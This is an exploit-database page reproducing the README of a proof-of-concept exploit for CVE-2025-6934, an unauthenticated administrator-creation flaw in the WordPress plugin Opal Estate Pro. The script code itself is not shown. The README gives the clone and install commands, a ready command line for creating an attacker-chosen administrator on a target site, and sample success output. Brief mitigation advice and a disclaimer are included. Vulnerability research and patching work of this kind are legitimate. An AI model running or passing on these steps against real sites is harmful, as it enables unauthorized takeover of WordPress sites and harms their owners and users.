Sploitus

Exploit for CVE-2025-6934

githubexploit Β· 2025-08-16

Exploit Code

README86 lines
## https://sploitus.com/exploit?id=65FAD546-0AA8-531B-9227-B4AAD843EB1B
# CVE-2025-6934 – WordPress Opal Estate Pro Exploit

  


πŸ“– Description
This repository contains a **Proof of Concept (PoC) exploit** for **CVE-2025-6934**, 
a critical vulnerability in **WordPress Plugin: Opal Estate Pro <= 1.7.5**, allowing **unauthenticated administrator account creation**.

⚠️ **Disclaimer**: This tool is provided for **educational and security research purposes only**.  
The author is **not responsible** for any misuse or damage caused.

---

## πŸš€ Features
- Automatic detection of plugin version from `readme.txt`
- Nonce extraction for registration
- Exploits vulnerable AJAX endpoint
- Creates a new **administrator account**

---

## πŸ”§ Installation
Clone the repo and install dependencies:

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934

pip3 install -r requirements.txt
````

**requirements.txt**

```
requests
beautifulsoup4
colorama
```

---

## ▢️ Usage

Run the script with your target:

```bash
python3 CVE-2025-6934.py -u http://target.com/ -mail newadmin@mail.com -password MySecurePass123 -user newadmin
```

βœ… Example Output:

```
[βœ”] Exploit Successful!
    Username : newadmin
    Email    : newadmin@mail.com
    Password : MySecurePass123
    Role     : administrator
```

---

## πŸ“Έ Screenshot

![Exploit Screenshot](screenshot.png)

---

## πŸ›‘οΈ Mitigation

* Update to the **latest version** of the plugin
* Or disable the vulnerable plugin immediately
* Monitor WordPress logs for unauthorized account creation

---

## πŸ‘€ Author

**Gaurav Bhattacharjee** (0xgh057r3c0n)

---

## πŸ“œ License

This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.